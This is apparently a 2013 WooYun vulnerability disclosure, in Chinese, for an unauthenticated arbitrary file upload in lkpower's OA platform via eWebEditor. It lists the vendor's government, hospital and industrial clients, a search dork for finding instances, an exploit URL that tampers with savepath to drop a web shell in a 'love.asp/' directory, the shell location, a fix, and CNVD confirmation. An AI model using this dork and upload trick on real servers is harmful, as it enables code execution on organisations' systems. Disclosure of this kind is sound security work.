当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035334

漏洞标题:北京联达动力OA协同办公管理平台任意文件上传漏洞

相关厂商:联达动力

漏洞作者: 猪猪侠

提交时间:2013-08-26 21:07

修复时间:2013-11-24 21:08

公开时间:2013-11-24 21:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-26: 细节已通知厂商并且等待厂商处理中
2013-08-30: 厂商已经确认,细节仅向厂商公开
2013-09-02: 细节向第三方安全合作伙伴开放
2013-10-24: 细节向核心白帽子及相关领域专家公开
2013-11-03: 细节向普通白帽子公开
2013-11-13: 细节向实习白帽子公开
2013-11-24: 细节向公众公开

简要描述:

通过测试,发现北京联达动力信息科技发展有限公司旗下的OA协同办公管理平台,存在任意文件上传漏洞,用户无需登录,即可上传文件至服务器,并且当做脚本文件执行。

详细说明:

#0 本OA协同管理系统的客户源
http://www.lkpower.com/templates/T_Second/index_150.html

国务院港澳办
国家体育总局
国土资源部土地整理中心
中国财政部投资评审中心
中国农业科学院
北京市教委
北京市教工委
山西省科学技术厅
陕西省核工业地质局
江苏省无线电管理局
昆明市环境保护局
昆明市水利局
上海市宝山区公路管理署
山东枣庄市工商行政管理局
宁波江东区人民政府
昆明市滇池管理局
陕西人民广播电台
沈阳广播电视台
路桥集团国际建设股份有限公司
中交第三公路工程局有限公司
中交第四公路工程局有限公司
中国建筑发展有限公司
济南四建(集团)有限责任公司
河南省宏力集团有限公司
中国水电八局溪洛渡施工局
北京天润子真建筑装饰有限责任公司
北京康成人工环境工程有限公司
首都医科大学附属北京安定医院
北京中关村医院
上海杨浦区疾病预防控制中心
江西省人民医院
安徽省合肥市第二人民医院
无锡市妇幼保健医院
徐州市肿瘤医院
吴江市中医院
泰州市人民医院
北京体育大学
北京化工大学
北京大学网络教育学院
中国地质大学长城学院
天津工业大学
天津商业大学
天津职业技术师范学院
中共河南省委党校
重庆城市管理职业学院
北京鼎事兴教育咨询有限公司
济南铁路局
哈尔滨铁路局
南宁铁路局(车辆段)
朔黄铁路肃宁分公司
长沙机场高速路建设经营有限公司
天津市政公路设备工程有限公司
铁宇国际运输(天津)有限公司
中国船舶重工集团公司
中国兵器工业集团公司
西北工业集团
北方特种能源集团有限公司
山西平阳重工机械有限责任公司
西安东方机电(集团)有限公司
中国石油集团测井有限公司
中国寰球工程公司
中煤第五建设公司
中国水利电力物资有限公司
淮南矿业(集团)有限责任公司
甘肃省火电工程公司
国电宁夏石嘴山发电有限责任公司
湖北华清电力有限公司
吉林龙华热电股份有限公司
湖北郧县电力公司
中机新能源开发有限公司
浙江省台州供水有限公司
中谷粮油集团公司
中盐集团
中远关西涂料化工有限公司
北京三元集团有限责任公司
深圳市泛谷药业有限公司
昆明邦宇制药有限公司
天津三华实业有限公司(韩资)
天津天铁冶金集团有限公司(天津铁厂)
湖南金荣企业集团
厦门ABB低压电器设备有限公司
无锡神羊实业(集团)有限公司
深圳蓝韵集团有限公司
北京怡海花园房地产开发有限公司
北京中天海康投资有限公司
北京东亚新华投资有限公司
北京顺苑房地产开发有限公司
北京昊远隆基房地产开发有限责任公司
北京佳莲伟业房地产开发有限公司
北京远中房地产开发有限公司
德翰置业集团有限公司
天津市房地产开发经营集团
上海松源房地产开发有限公司
北京英图光彩置业有限责任公司
中国平安保险(集团)股份有限公司
中国信达资产管理股份有限公司
泰康人寿保险股份有限公司
北京保险行业协会
中国民族证券有限责任公司
华宸信托有限责任公司
北京远景环球投资顾问有限责任公司
北京国富投资管理公司
新时代证券有限责任公司
天伦国际酒店管理集团
北京天伦王朝酒店
北京伯豪瑞廷酒店
北京欣燕都酒店连锁有限公司
北京蕉叶饮食有限公司
北京南国苑餐饮管理有限公司
北京黎昌海鲜大酒楼
沈阳黎明国际酒店
广州亚洲国际酒店
中国普天信息产业集团公司
中国铁通集团有限公司
中国网通(集团)有限公司
北京市通信公司
大唐高鸿数据网络技术股份有限公司
闪联信息技术工程中心有限公司
四川电信实业集团有限责任公司
北京交大网通信息技术有限公司
北京富迪通科技发展公司
中粮集团有限公司


#1 问题描述
OA协同办公管理平台调用了某开源编辑器,ewebeditor,savepath 可篡改导致可上传任意文件至 /love.asp/ 类似文件夹中,并讲上传的文件当做脚本文件执行。
通过谷歌搜索:
北京联达动力信息科技发展有限公司 intitle:登录
http://222.132.***.***:8080/lkoa6/Editor/ewebeditor.htm?id=txtNR&style=coolblue&&savepathfilename=myText3&savepath=../LKUPLOADFILE/dzyjuploadfiles/love.asp/

lkpower_upload.jpg


#2 成功上传后信息

<IMG border=0 src="/lkoa6/LKUPLOADFILE/dzyjuploadfiles/love.asp/20130826202310486.jpg">

漏洞证明:

#3 SHELL 地址
http://222.132.***.***:8080/lkoa6/LKUPLOADFILE/dzyjuploadfiles/love.asp/20130826202310486.jpg

lkpower_uploaded.jpg


修复方案:

# 校验savepath,或强制客户使用iis7以上中间件。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-30 22:58

厂商回复:

CNVD确认并复现所述情况,通过互联网找到的用户实例较少,不过仍然可以确认为通用软件漏洞。从其官方网站用户列表找到的实例基本都处于内部网站,如果白帽子后续测试到其他实例,也欢迎继续以事件型漏洞提交。
rank 20

最新状态:

暂无